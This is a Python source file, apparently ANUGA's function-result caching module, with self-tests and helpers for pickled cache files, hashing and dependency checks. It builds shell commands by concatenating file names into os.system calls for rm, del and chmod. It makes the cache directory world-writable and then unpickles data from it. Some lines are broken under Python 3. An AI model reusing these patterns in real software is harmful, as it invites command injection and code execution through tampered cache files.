logtestOK('Basic caching functionality (with compression)')
else:
logtestOK('Basic caching functionality (without compression)')
else:
logtesterror('Cached result does not match computed result')
# Test return_filename
#
try:
FN = cache(f,(a,b,c,N), {'x':x, 'y':y}, verbose=verbose, \
return_filename=1)
assert(FN[:2] == 'f_') # FN is constructed as funcname + '_' + arghash
logtestOK('Return of cache filename')
except:
logtesterror('Return of cache filename failed')
# Test existence of cachefiles
#
try:
(datafile,compressed0) = myopen(CD+FN+'_'+file_types[0],"rb",compression)
(argsfile,compressed1) = myopen(CD+FN+'_'+file_types[1],"rb",compression)
(admfile,compressed2) = myopen(CD+FN+'_'+file_types[2],"rb",compression)
logtestOK('Presence of cache files')
datafile.close()
argsfile.close()
admfile.close()
except:
logtesterror('Expected cache files did not exist')
# Test 'test' function when cache is present
#
try:
#T1 = cache(f,(a,b,c,N), {'x':x, 'y':y}, verbose=verbose, \
# evaluate=1)
T4 = cache(f,(a,b,c,N), {'x':x, 'y':y}, verbose=verbose, test=1)
assert(T1 == T4)
logtestOK("Option 'test' when cache file present")
except:
logtesterror("Option 'test' when cache file present failed")
# Test that 'clear' works
#
#try:
# cache(f,'clear',verbose=verbose)
# logtestOK('Clearing of cache files')
#except:
# logtesterror('Clear does not work')
try:
cache(f,(a,b,c,N), {'x':x, 'y':y}, verbose=verbose, clear=1)
logtestOK('Clearing of cache files')
except:
logtesterror('Clear does not work')
# Test 'test' function when cache is absent
#
try:
T4 = cache(f,(a,b,c,N), {'x':x, 'y':y}, verbose=verbose, test=1)
assert(T4 is None)
logtestOK("Option 'test' when cache absent")
except:
logtesterror("Option 'test' when cache absent failed")
# Test dependencies
#
T1 = cache(f,(a,b,c,N), {'x':x, 'y':y}, verbose=verbose, \
dependencies=DepFN)
T2 = cache(f,(a,b,c,N), {'x':x, 'y':y}, verbose=verbose, \
dependencies=DepFN)
if T1 == T2:
logtestOK('Basic dependencies functionality')
else:
logtesterror('Dependencies do not work')
# Test basic wildcard dependency
#
T3 = cache(f,(a,b,c,N), {'x':x, 'y':y}, verbose=verbose, \
dependencies=DepFN_wildcard)
if T1 == T3:
logtestOK('Basic dependencies with wildcard functionality')
else:
logtesterror('Dependencies with wildcards do not work')
# Test that changed timestamp in dependencies triggers recomputation
# Modify dependency file
Depfile = open(DepFN,'a')
Depfile.write('You must cut down the mightiest tree in the forest with <NAME>')
Depfile.close()
T3 = cache(f,(a,b,c,N), {'x':x, 'y':y}, verbose=verbose, \
dependencies=DepFN, test = 1)
if T3 is None:
logtestOK('Changed dependencies recognised')
else:
logtesterror('Changed dependencies not recognised')
# Test recomputation when dependencies have changed
#
T3 = cache(f,(a,b,c,N), {'x':x, 'y':y}, verbose=verbose, \
dependencies=DepFN)
if T1 == T3:
logtestOK('Recomputed value with changed dependencies')
else:
logtesterror('Recomputed value with changed dependencies failed')
# Performance test (with statistics)
# Don't really rely on this as it will depend on specific computer.
#
set_option('savestat',1)
N = 20*N #Should be large on fast computers...
tt = time.time()
T1 = cache(f,(a,b,c,N), {'x':x, 'y':y}, verbose=verbose)
t1 = time.time() - tt
tt = time.time()
T2 = cache(f,(a,b,c,N), {'x':x, 'y':y}, verbose=verbose)
t2 = time.time() - tt
if T1 == T2:
if t1 > t2:
logtestOK('Performance test: relative time saved = %s pct' \
%str(round(old_div((t1-t2)*100,t1),2)))
else:
logtesterror('Basic caching failed for new problem')
# Test presence of statistics file
#
try:
DIRLIST = os.listdir(CD)
SF = []
for FN in DIRLIST:
if FN.find(statsfile) >= 0: # str.find; string.find() does not exist in Python 3
fid = open(CD+FN,'r')
fid.close()
logtestOK('Statistics files present')
except:
logtestOK('Statistics files cannot be opened')
print_header_box('Show sample output of the caching function:')
T2 = cache(f,(a,b,c,N), {'x':x, 'y':y}, verbose=0)
T2 = cache(f,(a,b,c,N), {'x':x, 'y':y}, verbose=0)
T2 = cache(f,(a,b,c,N), {'x':x, 'y':y}, verbose=1)
print_header_box('Show sample output of cachestat():')
if unix:
cachestat()
else:
try:
import time
t = time.strptime('2030','%Y')
cachestat()
except:
log.critical('cachestat() does not work here, because it relies on '
'time.strptime() which is unavailable in Windows')
logtestOK('Caching self test completed')
# Test setoption (not yet implemented)
#
#==============================================================================
# Auxiliary functions
#==============================================================================
# Import pickler
# cPickle is used by functions mysave, myload, and compare
#
#import cPickle # 10 to 100 times faster than pickle
#import pickle as pickler
import dill as pickler
#pickler = cPickle
# Local immutable constants
#
comp_level = 1 # Compression level for zlib.
# comp_level = 1 works well.
textwidth1 = 16 # Text width of key fields in report forms.
#textwidth2 = 132 # Maximal width of textual representation of
textwidth2 = 300 # Maximal width of textual representation of
# arguments.
textwidth3 = 16 # Initial width of separation lines. Is modified.
textwidth4 = 50 # Text width in logtestOK()
statsfile = '.cache_stat' # Basefilename for cached statistics.
# It will reside in the chosen cache directory.
file_types = ['Result', # File name extension for cached function results.
'Args', # File name extension for stored function args.
'Admin'] # File name extension for administrative info.
Reason_msg = ['OK', # Verbose reasons for recomputation
'No cached result',
'Dependencies have changed',
'Arguments have changed',
'Bytecode has changed',
'Recomputation was requested by caller',
'Cached file was unreadable']
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def CacheLookup(CD, FN, my_F, args, kwargs, deps, verbose, compression,
dependencies):
"""Determine whether cached result exists and return info.
USAGE:
(T, FN, Retrieved, reason, comptime, loadtime, compressed) = \
CacheLookup(CD, FN, my_F, args, kwargs, deps, verbose, compression, \
dependencies)
INPUT ARGUMENTS:
CD -- Cache Directory
FN -- Suggested cache file name
my_F -- Callable object
args -- Tuple of arguments
kwargs -- Dictionary of keyword arguments
deps -- Dependencies time stamps
verbose -- Flag text output
compression -- Flag zlib compression
dependencies -- Given list of dependencies
OUTPUT ARGUMENTS:
T -- Cached result if present otherwise None
FN -- File name under which new results must be saved
Retrieved -- True if a valid cached result was found
reason -- 0: OK (if Retrieved),
1: No cached result,
2: Dependencies have changed,
3: Arguments have changed
4: Bytecode has changed
5: Recomputation was forced
6: Unreadable file
comptime -- Number of seconds it took to compute the cached result
loadtime -- Number of seconds it took to load cached result
compressed -- Flag (0,1) if cached results were compressed or not
DESCRIPTION:
Determine if cached result exists as follows:
Load in saved arguments and bytecode stored under hashed filename.
If they are identical to current arguments and bytecode and if dependencies
have not changed their time stamp, then return cached result.
Otherwise return filename under which new results should be cached.
Hash collisions are handled recursively by calling CacheLookup again with a
modified filename.
"""
import time, string
# Assess whether cached result exists - compressed or not.
#
if verbose:
log.critical('Caching: looking for cached files %s_{%s,%s,%s}.z'
% (CD+FN, file_types[0], file_types[1], file_types[2]))
(datafile,compressed0) = myopen(CD+FN+'_'+file_types[0],"rb",compression)
(argsfile,compressed1) = myopen(CD+FN+'_'+file_types[1],"rb",compression)
(admfile,compressed2) = myopen(CD+FN+'_'+file_types[2],"rb",compression)
if verbose is True and deps is not None:
log.critical('Caching: Dependencies are %s' % list(deps.keys()))
if not (argsfile and datafile and admfile) or \
not (compressed0 == compressed1 and compressed0 == compressed2):
# Cached result does not exist or files were compressed differently
#
# This will ensure that evaluation will take place unless all files are
# present.
reason = 1
return(None,FN,None,reason,None,None,None) #Recompute using same filename
compressed = compressed0 # Remember if compressed files were actually used
datafile.close()
# Retrieve arguments and adm. info
#
R, reason = myload(argsfile, compressed) # The original arguments
argsfile.close()
if reason > 0:
# Recompute using same filename
return(None, FN, None, reason, None, None, None)
else:
(argsref, kwargsref) = R
R, reason = myload(admfile, compressed)
admfile.close()
if reason > 0:
return(None,FN,None,reason,None,None,None) # Recompute using same filename
depsref = R[0] # Dependency statistics
comptime = R[1] # The computation time
coderef = R[2] # The byte code
funcname = R[3] # The function name
# Check if dependencies have changed
#
if dependencies and not compare(depsref, deps):
if verbose:
log.critical('Dependencies %s have changed - recomputing' % dependencies)
# Don't use cached file - recompute
reason = 2
return(None, FN, None, reason, None, None, None)
# Get bytecode from my_F
#
bytecode = get_bytecode(my_F)
# Check if arguments or bytecode have changed
if compare(argsref, args) and compare(kwargsref, kwargs) and \
(not options['bytecode'] or compare(bytecode, coderef)):
# Arguments and dependencies match. Get cached results
T, loadtime, compressed, reason = load_from_cache(CD, FN, compressed)
if reason > 0:
# Recompute using same FN
return(None, FN, None, reason, None, None, None)
Retrieved = 1
reason = 0
if verbose:
msg4(funcname,args,kwargs,deps,comptime,loadtime,CD,FN,compressed)
if loadtime >= comptime:
log.critical('Caching did not yield any gain.')
log.critical('Consider executing function %s without caching.'
% funcname)
else:
# Non matching arguments or bytecodes signify a hash-collision.
# This is resolved by recursive search of cache filenames
# until either a matching or an unused filename is found.
#
(T, FN, Retrieved, reason, comptime, loadtime, compressed) = \
CacheLookup(CD, FN+'x', my_F, args, kwargs, deps,
verbose, compression, dependencies)
# The real reason is that args or bytecodes have changed.
# Not that the recursive search has found an unused filename
if not Retrieved:
if not compare(bytecode, coderef):
reason = 4 # Bytecode has changed
else:
reason = 3 # Arguments have changed
# PADARN NOTE 17/12/12: Adding a special case to handle the existence of a
# FitInterpolate object. C Structures are serialised so they can be pickled.
#---------------------------------------------------------------------------
from anuga.fit_interpolate.general_fit_interpolate import FitInterpolate
# Setup for quad_tree extension
#from anuga.utilities import compile
#if compile.can_use_C_extension('quad_tree_ext.c'):
#import quad_tree_ext
#else:
# msg = "C implementation of quad tree extension not avaliable"
# raise Exception(msg)
# Setup for sparse_matrix extension
#from anuga.utilities import compile
#if compile.can_use_C_extension('sparse_matrix_ext.c'):
#else:
# msg = "C implementation of sparse_matrix extension not avaliable"
# raise Exception(msg)
import anuga.utilities.sparse_matrix_ext as sparse_matrix_ext
import anuga.utilities.quad_tree_ext as quad_tree_ext
from anuga.geometry.aabb import AABB
if isinstance(T, FitInterpolate):
if hasattr(T,"D"):
T.D=sparse_matrix_ext.deserialise_dok(T.D)
if hasattr(T,"AtA"):
T.AtA=sparse_matrix_ext.deserialise_dok(T.AtA)
if hasattr(T,"root"):
T.build_quad_tree(verbose=verbose)
#---------------------------------------------------------------------------
return((T, FN, Retrieved, reason, comptime, loadtime, compressed))
# -----------------------------------------------------------------------------
def clear_cache(CD, my_F=None, verbose=None):
"""Clear cache for my_F.
USAGE:
clear(CD, my_F, verbose)
ARGUMENTS:
CD -- Caching directory (required)
my_F -- Function object (default: None)
verbose -- Flag verbose output (default: None)
DESCRIPTION:
If my_F is None, clear everything,
otherwise clear only files pertaining to my_F.
"""
import os, re
if CD[-1] != os.sep:
CD = CD+os.sep
if verbose is None:
verbose = options['verbose']
# FIXME: Windows version needs to be tested
if my_F:
funcname = get_funcname(my_F)
if verbose:
log.critical('Clearing %s' % CD+funcname+'*')
file_names = os.listdir(CD)
for file_name in file_names:
#RE = re.search('^' + funcname,file_name) #Inefficient
#if RE:
if file_name[:len(funcname)] == funcname:
if unix:
os.remove(CD+file_name)
else:
os.system('del '+CD+file_name)
# FIXME: os.remove doesn't work under windows
else:
file_names = os.listdir(CD)
if len(file_names) > 0:
if verbose:
log.critical('Remove the following files:')
for file_name in file_names:
log.critical(' ' + file_name)
A = input('Delete (Y/N)[N] ?')
else:
A = 'Y'
if A == 'Y' or A == 'y':
for file_name in file_names:
if unix:
os.remove(CD+file_name)
else:
os.system('del '+CD+file_name)
# FIXME: os.remove doesn't work under windows
#exitcode=os.system('/bin/rm '+CD+'* 2> /dev/null')
# -----------------------------------------------------------------------------
def DeleteOldFiles(CD,verbose=None):
"""Remove expired files
USAGE:
DeleteOldFiles(CD,verbose=None)
"""
if verbose is None:
verbose = options['verbose']
maxfiles = options['maxfiles']
# FIXME: Windows version
import os
block = 1000 # How many files to delete per invokation
Files = os.listdir(CD)
numfiles = len(Files)
if not unix: return # FIXME: Windows case ?
if numfiles > maxfiles:
delfiles = numfiles-maxfiles+block
if verbose:
log.critical('Deleting %d expired files:' % delfiles)
os.system('ls -lur '+CD+'* | head -' + repr(delfiles)) # List them
os.system('ls -ur '+CD+'* | head -' + repr(delfiles) + ' | xargs /bin/rm')
# Delete them
# FIXME: Replace this with os.listdir and os.remove
# -----------------------------------------------------------------------------
def save_args_to_cache(CD, FN, args, kwargs, compression):
"""Save arguments to cache
USAGE:
save_args_to_cache(CD,FN,args,kwargs,compression)
"""
import time, os, sys
(argsfile, compressed) = myopen(CD+FN+'_'+file_types[1], 'wb', compression)
if argsfile is None:
msg = 'ERROR (caching): Could not open argsfile for writing: %s' %FN
raise IOError(msg)
mysave((args,kwargs),argsfile,compression) # Save args and kwargs to cache
argsfile.close()
# Change access rights if possible
#
#if unix:
# try:
# exitcode=os.system('chmod 666 '+argsfile.name)
# except:
# pass
#else:
# pass # FIXME: Take care of access rights under Windows
return
# -----------------------------------------------------------------------------
def save_results_to_cache(T, CD, FN, my_F, deps, comptime, funcname,
dependencies, compression):
"""Save computed results T and admin info to cache
USAGE:
save_results_to_cache(T, CD, FN, my_F, deps, comptime, funcname,
dependencies, compression)
"""
import time, os, sys
verbose = False
# PADARN NOTE 17/12/12: Adding a special case to handle the existence of a
# FitInterpolate object. C Structures are serialised so they can be pickled.
#---------------------------------------------------------------------------
from anuga.fit_interpolate.general_fit_interpolate import FitInterpolate
import anuga.utilities.quad_tree_ext as quad_tree_ext
import anuga.utilities.sparse_matrix_ext as sparse_matrix_ext
from anuga.geometry.aabb import AABB
if isinstance(T, FitInterpolate):
if hasattr(T,"D"):
T.D=sparse_matrix_ext.serialise_dok(T.D)
if hasattr(T,"AtA"):
T.AtA=sparse_matrix_ext.serialise_dok(T.AtA)
if hasattr(T,"root"):
T.root.root=None
#---------------------------------------------------------------------------
(datafile, compressed1) = myopen(CD+FN+'_'+file_types[0],'wb',compression)
(admfile, compressed2) = myopen(CD+FN+'_'+file_types[2],'wb',compression)
if not datafile:
if verbose:
log.critical('ERROR: Could not open %s' % (CD+FN+'_'+file_types[0]))
raise IOError
if not admfile:
if verbose:
log.critical('ERROR: Could not open %s' % (CD+FN+'_'+file_types[2]))
raise IOError
t0 = time.time()
mysave(T,datafile,compression) # Save data to cache
datafile.close()
#savetime = round(time.time()-t0,2)
savetime = time.time()-t0
bytecode = get_bytecode(my_F) # Get bytecode from function object
admtup = (deps, comptime, bytecode, funcname) # Gather admin info
mysave(admtup,admfile,compression) # Save admin info to cache
admfile.close()
# Change access rights if possible
#
#if unix:
# try:
# exitcode=os.system('chmod 666 '+datafile.name)
# exitcode=os.system('chmod 666 '+admfile.name)
# except:
# pass
#else:
# pass # FIXME: Take care of access rights under Windows
return(savetime)
# -----------------------------------------------------------------------------
def load_from_cache(CD, FN, compression):
"""Load previously cached data from file FN
USAGE:
load_from_cache(CD,FN,compression)
"""
import time
(datafile, compressed) = myopen(CD+FN+'_'+file_types[0],"rb",compression)
t0 = time.time()
T, reason = myload(datafile,compressed)
loadtime = time.time()-t0
datafile.close()
return T, loadtime, compressed, reason
# -----------------------------------------------------------------------------
def myopen(FN, mode, compression=True):
"""Open file FN using given mode
USAGE:
myopen(FN, mode, compression=True)
ARGUMENTS:
FN -- File name to be opened
mode -- Open mode (as in open)
compression -- Flag zlib compression
DESCRIPTION:
if compression
Attempt first to open FN + '.z'
If this fails try to open FN
else do the opposite
Return file handle plus info about whether it was compressed or not.
"""
import string
# Determine if file exists already (if writing was requested)
# This info is only used to determine if access modes should be set
#
if 'w' in mode or 'a' in mode:
try:
file = open(FN+'.z','r')
file.close()
new_file = 0
except:
try:
file = open(FN,'r')
file.close()
new_file = 0
except:
new_file = 1
else:
new_file = 0 #Assume it exists if mode was not 'w'
compressed = 0
if compression:
try:
file = open(FN+'.z',mode)
compressed = 1
except:
try:
file = open(FN,mode)
except:
file = None
else:
try:
file = open(FN,mode)
except:
try:
file = open(FN+'.z',mode)
compressed = 1
except:
file = None
# Now set access rights if it is a new file
#
if file and new_file:
if unix:
exitcode=os.system('chmod 666 '+file.name)
else:
pass # FIXME: Take care of access rights under Windows
return(file, compressed)
# -----------------------------------------------------------------------------
def myload(file, compressed):
"""Load data from file
USAGE:
myload(file, compressed)
"""
reason = 0
try:
if compressed:
import zlib
RsC = file.read()
try:
Rs = zlib.decompress(RsC)
except:
# File "./caching.py", line 1032, in load_from_cache
# T = myload(datafile,compressed)
# File "./caching.py", line 1124, in myload
# Rs = zlib.decompress(RsC)
# zlib.error: Error -5 while decompressing data
#raise Exception
reason = 6 # Unreadable file
return None, reason
del RsC # Free up some space
R = pickler.loads(Rs)
else:
try:
R = pickler.load(file)
#except EOFError, e:
except:
#Catch e.g., file with 0 length or corrupted
reason = 6 # Unreadable file
return None, reason
except MemoryError:
if options['verbose']:
log.critical('ERROR: Out of memory while loading %s, aborting'
% file.name)
# Raise the error again for now
#
raise MemoryError
return R, reason
# -----------------------------------------------------------------------------
def mysave(T, file, compression):
"""Save data T to file
USAGE:
mysave(T, file, compression)
"""
bin = options['bin']
if compression:
try:
import zlib
except:
log.critical()
log.critical('*** Could not find zlib ***')
log.critical('*** Try to run caching with compression off ***')
log.critical("*** caching.set_option('compression', 0) ***")
raise Exception
try:
Ts = pickler.dumps(T, bin)
except MemoryError:
msg = '****WARNING (caching.py): Could not pickle data for compression.'
msg += ' Try using compression = False'
raise MemoryError(msg)
else:
# Compressed pickling
TsC = zlib.compress(Ts, comp_level)
file.write(TsC)
else:
# Uncompressed pickling
pickler.dump(T, file, bin)
# FIXME: This may not work on Windoze network drives.
# The error msg is IOError: [Errno 22] Invalid argument
# Testing with small files was OK, though.
# I think this is an OS problem.
# Excerpt from http://www.ultraseek.com/support/faqs/4173.html
# The error is caused when there is a problem with server disk access (I/0). This happens at the OS level, and there is no controlling these errors through the Ultraseek application.
#
#Ultraseek contains an embedded Python interpreter. The exception "exceptions.IOError: [Errno 22] Invalid argument" is generated by the Python interpreter. The exception is thrown when a disk access operation fails due to an I/O-related reason.
#
#The following extract is taken from the site http://www.python.org:
#
#---------------------------------------------------------------------------------------------
#exception IOError
#Raised when an I/O operation (such as a print statement, the built-in open() function or a method of a file object) fails for an I/O-related reason, e.g., ``file not found'' or ``disk full''.
#This class is derived from EnvironmentError. See the discussion above for more information on exception instance attributes.
#---------------------------------------------------------------------------------------------
#
#The error code(s) that accompany exceptions are described at:
#http://www.python.org/dev/doc/devel//lib/module-errno.html
#
#You can view several postings on this error message by going to http://www.python.org, and typing the below into the search box:
#
#exceptions.IOError invalid argument Errno 22
#try:
# pickler.dump(T,file,bin)
#except IOError, e:
# print e
# msg = 'Could not store to %s, bin=%s' %(file, bin)
# raise Exception(msg)
# -----------------------------------------------------------------------------
def myhash(T, ids=None):
"""Compute hashed integer from a range of inputs.
If T is not hashable being e.g. a tuple T, myhash will recursively
hash the values individually
USAGE:
myhash(T)
ARGUMENTS:
T -- Anything
"""
# Replacing Python2: if type(T) in [TupleType, ListType, DictType, InstanceType]:
if isinstance(T, (tuple, list, dict)) or type(T) is type:
# Keep track of unique id's to protect against infinite recursion
if ids is None: ids = []
# Check if T has already been encountered
i = id(T)
if i in ids:
return 0 # T has been hashed already
else:
ids.append(i)
# Start hashing
    # On some architectures None, False and True get different hash values
if T is None:
return(-1)
if T is False:
return(0)
if T is True:
return(1)
# Get hash values for hashable entries
if isinstance(T, (tuple, list)):
#print('LIST or TUPLE', T)
hvals = ''
for t in T:
h = myhash(t, ids)
hvals += str(h)
val = hash(hvals)
elif isinstance(T, dict):
#print('DICT')
I = list(T.items())
if system_tools.major_version == 2:
# Make dictionary ordering unique
I.sort()
else:
# As of Python 3.7 they now are ordered: https://mail.python.org/pipermail/python-dev/2017-December/151283.html
pass
val = myhash(I, ids)
elif isinstance(T, num.ndarray):
#print('NUM')
T = num.array(T) # Ensure array is contiguous
# Use mean value for efficiency
val = hash(num.average(T.flat))
elif callable(T):
#print('CALLABLE')
I = myhash(T.__dict__, ids)
val = myhash(I, ids)
elif type(T) is type: #isinstance(T, object): # This is instead of the old InstanceType:
#elif isinstance(T, object): # This is instead of the old InstanceType:
#print('OBJECT', T, dir(T), type(T))
# Use the attribute values
val = myhash(T.__dict__, ids)
else:
# This must be a simple Python type that should hash without problems
#print('ALL', T, type(T))
val = hash(str(T))
#print(ids, val)
return(val)
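
# -----------------------------------------------------------------------------
# Illustrative sketch added as documentation; it is not part of the original
# module and is never called on import. It shows how myhash() digests nested
# structures, and that numeric arrays are hashed via their average (cheap but
# coarse: permutations of the same values collide).
def _example_myhash_usage():
    args1 = {'dt': 0.5, 'points': [(0, 0), (1, 2)]}
    args2 = {'dt': 0.5, 'points': [(0, 0), (1, 2)]}
    print(myhash(args1) == myhash(args2))   # True: identical structures

    a = num.array([1.0, 2.0, 3.0])
    b = num.array([3.0, 2.0, 1.0])
    print(myhash(a) == myhash(b))           # True: same mean, hence same hash
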
def compare(A, B, ids=None):
"""Safe comparison of general objects
USAGE:
compare(A,B)
DESCRIPTION:
      Return True if A and B are identical, False otherwise
"""
# Keep track of unique id's to protect against infinite recursion
if ids is None: ids = {}
# Check if T has already been encountered
iA = id(A)
iB = id(B)
if (iA, iB) in ids:
# A and B have been compared already
return ids[(iA, iB)]
else:
ids[(iA, iB)] = True
# Check if arguments are of same type
if type(A) != type(B):
return False
# Compare recursively based on argument type
if isinstance(A, (tuple, list)):
N = len(A)
if len(B) != N:
identical = False
else:
identical = True
for i in range(N):
if not compare(A[i], B[i], ids):
identical = False; break
elif isinstance(A, dict):
if len(A) != len(B):
identical = False
        else:
            # Dictionaries are insertion-ordered as of Python 3.7, but two
            # dicts with the same content need not share that order, and
            # calling compare(A, B, ids) here would always return True because
            # (id(A), id(B)) was recorded in ids on entry. Compare the item
            # lists instead, sorted on the string form of the keys to make the
            # ordering unique (as the old Python 2 code did).
            a = sorted(list(A.items()), key=lambda kv: str(kv[0]))
            b = sorted(list(B.items()), key=lambda kv: str(kv[0]))
            identical = compare(a, b, ids)
elif isinstance(A, num.ndarray):
# Use element by element comparison
identical = num.alltrue(A==B)
#elif type(A) == types.InstanceType:
elif type(A) is type:
# Take care of special case where elements are instances
# Base comparison on attributes
identical = compare(A.__dict__,
B.__dict__,
ids)
else:
# Fall back to general code
try:
identical = (A == B)
except:
import pickle
# Use pickle to compare data
# The native pickler must be used
# since the faster cPickle does not
# guarantee a unique translation
# FIXME (Ole): Try to fall back on the dill pickler
try:
identical = (pickle.dumps(A,0) == pickle.dumps(B,0))
except:
identical = False
# Record result of comparison and return
ids[(iA, iB)] = identical
return(identical)
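
# -----------------------------------------------------------------------------
# Illustrative sketch added as documentation; it is not part of the original
# module and is never called on import. It shows why compare() is used instead
# of a plain '==': nested containers holding numeric arrays are compared
# element by element and reduced to a single boolean.
def _example_compare_usage():
    A = [1, 2, num.array([1.0, 2.0, 3.0])]
    B = [1, 2, num.array([1.0, 2.0, 3.0])]
    C = [1, 2, num.array([1.0, 2.0, 4.0])]

    print(compare(A, B))   # True
    print(compare(A, C))   # False
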
# -----------------------------------------------------------------------------
def nospace(s):
"""Replace spaces in string s with underscores
USAGE:
nospace(s)
ARGUMENTS:
s -- string
"""
    return(s.replace(' ', '_'))
# -----------------------------------------------------------------------------
def get_funcname(my_F):
"""Retrieve name of function object func (depending on its type)
USAGE:
get_funcname(my_F)
"""
import string
if type(my_F) == types.FunctionType:
funcname = my_F.__name__
elif type(my_F) == types.BuiltinFunctionType:
funcname = my_F.__name__
else:
if system_tools.major_version == 3:
            tab = str.maketrans("<>'", "   ")  # Map each of the three chars to a space
tmp = str.translate(repr(my_F), tab)
tmp = str.split(tmp)
elif system_tools.major_version == 2:
            tab = string.maketrans("<>'", "   ")  # Map each of the three chars to a space
tmp = string.translate(repr(my_F), tab)
tmp = string.split(tmp)
else:
            raise Exception('Unsupported version: %s' % system_tools.version)
funcname = ' '.join(tmp)
# Truncate memory address as in
# class __main__.Dummy at 0x00A915D0
index = funcname.find('at 0x')
if index >= 0:
funcname = funcname[:index+5] # Keep info that there is an address
funcname = nospace(funcname)
return(funcname)
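
# -----------------------------------------------------------------------------
# Illustrative sketch added as documentation; it is not part of the original
# module and is never called on import. It shows the kind of identifier
# get_funcname() produces for a plain function and for a callable instance
# (the exact string for the instance depends on its repr and on the truncated
# memory address).
def _example_get_funcname():
    def integrate(x):
        return x * x

    print(get_funcname(integrate))      # 'integrate'

    class Integrator(object):
        def __call__(self, x):
            return x * x

    # Something like '..._Integrator_object_at_0x': spaces, quotes and angle
    # brackets are removed so the name can be used in a cache filename
    print(get_funcname(Integrator()))
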
# -----------------------------------------------------------------------------
def get_bytecode(my_F):
""" Get bytecode and associated values from function object.
    It is assumed that my_F is callable and is either
    a function,
    a class,
    a method,
    a callable object
    or a builtin function.
USAGE:
get_bytecode(my_F)
"""
if type(my_F) == types.FunctionType:
# Function
return get_func_code_details(my_F)
elif type(my_F) == types.MethodType:
# Method
return get_func_code_details(my_F.__func__)
elif type(my_F) in [types.BuiltinFunctionType, types.BuiltinMethodType]:
# Built-in functions are assumed not to change
return None, 0, 0, 0
elif inspect.isclass(my_F):
return get_func_code_details(my_F.__init__)
elif hasattr(my_F, '__call__'):
bytecode = get_func_code_details(my_F.__call__.__func__)
# Add hash value of object to detect attribute changes
return bytecode + (myhash(my_F),)
else:
msg = 'Unknown function type: %s' % type(my_F)
raise Exception(msg)
def get_func_code_details(my_F):
"""Extract co_code, co_consts, co_argcount, func_defaults
"""
bytecode = my_F.__code__.co_code
consts = my_F.__code__.co_consts
argcount = my_F.__code__.co_argcount
defaults = my_F.__defaults__
return bytecode, consts, argcount, defaults
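
# -----------------------------------------------------------------------------
# Illustrative sketch added as documentation; it is not part of the original
# module and is never called on import. It shows that the tuple returned by
# get_bytecode() changes when a function's body changes, which is what lets
# the cache detect stale results.
def _example_get_bytecode():
    def f(x, a=1):
        return a * x

    def g(x, a=1):
        return a * x + 1          # Different body

    code_f = get_bytecode(f)      # (co_code, co_consts, co_argcount, defaults)
    code_g = get_bytecode(g)
    print(code_f == code_g)       # False: a changed body forces recomputation
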
# -----------------------------------------------------------------------------
def get_depstats(dependencies):
""" Build dictionary of dependency files and their size, mod. time and ctime.
USAGE:
get_depstats(dependencies):
"""
d = {}
if dependencies:
#Expand any wildcards
import glob
expanded_dependencies = []
for FN in dependencies:
expanded_FN = glob.glob(FN)
if expanded_FN == []:
errmsg = 'ERROR (caching.py): Dependency '+FN+' does not exist.'
raise Exception(errmsg)
expanded_dependencies += expanded_FN
for FN in expanded_dependencies:
if not isinstance(FN, basestring):
errmsg = 'ERROR (caching.py): Dependency must be a string.\n'
errmsg += ' Dependency given: %s' %FN
raise Exception(errmsg)
if not os.access(FN,os.F_OK):
errmsg = 'ERROR (caching.py): Dependency '+FN+' does not exist.'
raise Exception(errmsg)
(size,atime,mtime,ctime) = filestat(FN)
# We don't use atime because that would cause recomputation every time.
# We don't use ctime because that is irrelevant and confusing for users.
d.update({FN : (size,mtime)})
return(d)
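
# -----------------------------------------------------------------------------
# Illustrative sketch added as documentation; it is not part of the original
# module and is never called on import. It shows the {filename: (size, mtime)}
# mapping produced by get_depstats(), assuming the module's Python 2/3 string
# shims (basestring) are available as elsewhere in this file.
def _example_get_depstats():
    import os
    import tempfile
    import time

    handle, filename = tempfile.mkstemp(suffix='.dat')
    os.close(handle)

    stats = get_depstats([filename])
    size, mtime = stats[filename]
    print('%s: %d bytes, modified %s' % (filename, size, time.ctime(mtime)))

    os.remove(filename)
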
# -----------------------------------------------------------------------------
def filestat(FN):
"""A safe wrapper using os.stat to get basic file statistics
The built-in os.stat breaks down if file sizes are too large (> 2GB ?)
USAGE:
filestat(FN)
DESCRIPTION:
Must compile Python with
CFLAGS="`getconf LFS_CFLAGS`" OPT="-g -O2 $CFLAGS" \
configure
      as given in section 8.1.1 Large File Support in the Library Reference
"""
import os, time
try:
stats = os.stat(FN)
size = stats[6]
atime = stats[7]
mtime = stats[8]
ctime = stats[9]
except:
# Hack to get the results anyway (works only on Unix at the moment)
#
log.critical('Hack to get os.stat when files are too large')
if unix:
tmp = '/tmp/cach.tmp.'+repr(time.time())+repr(os.getpid())
# Unique filename, FIXME: Use random number
# Get size and access time (atime)
#
exitcode=os.system('ls -l --full-time --time=atime '+FN+' > '+tmp)
(size,atime) = get_lsline(tmp)
# Get size and modification time (mtime)
#
exitcode=os.system('ls -l --full-time '+FN+' > '+tmp)
(size,mtime) = get_lsline(tmp)
# Get size and ctime
#
exitcode=os.system('ls -l --full-time --time=ctime '+FN+' > '+tmp)
(size,ctime) = get_lsline(tmp)
try:
exitcode=os.system('rm '+tmp)
# FIXME: Gives error if file doesn't exist
except:
pass
else:
pass
raise Exception # FIXME: Windows case
return(int(size),atime,mtime,ctime)
# -----------------------------------------------------------------------------
def get_lsline(FN):
"""get size and time for filename
USAGE:
get_lsline(file_name)
DESCRIPTION:
Read in one line 'ls -la' item from file (generated by filestat) and
convert time to seconds since epoch. Return file size and time.
"""
import string, time
f = open(FN,'r')
info = f.read()
info = string.split(info)
size = info[4]
week = info[5]
mon = info[6]
day = info[7]
hour = info[8]
year = info[9]
    timestr = week + ' ' + mon + ' ' + day + ' ' + hour + ' ' + year
    timetup = time.strptime(timestr)
    t = time.mktime(timetup)
return(size, t)
# -----------------------------------------------------------------------------
def checkdir(CD, verbose=None, warn=False):
"""Check or create caching directory
USAGE:
checkdir(CD,verbose):
ARGUMENTS:
CD -- Directory
verbose -- Flag verbose output (default: None)
DESCRIPTION:
If CD does not exist it will be created if possible
"""
import os
import os.path
if CD[-1] != os.sep:
CD = CD + os.sep # Add separator for directories
CD = os.path.expanduser(CD) # Expand ~ or ~user in pathname
    if not (os.access(CD, os.R_OK | os.W_OK) or CD == ''):  # Need read and write access
try:
exitcode=os.mkdir(CD)
# Change access rights if possible
#
if unix:
exitcode=os.system('chmod 777 '+CD)
else:
                pass  # FIXME: What about access rights under Windows?
if verbose: log.critical('MESSAGE: Directory %s created.' % CD)
except:
if warn is True:
log.critical('WARNING: Directory %s could not be created.' % CD)
if unix:
CD = '/tmp/'
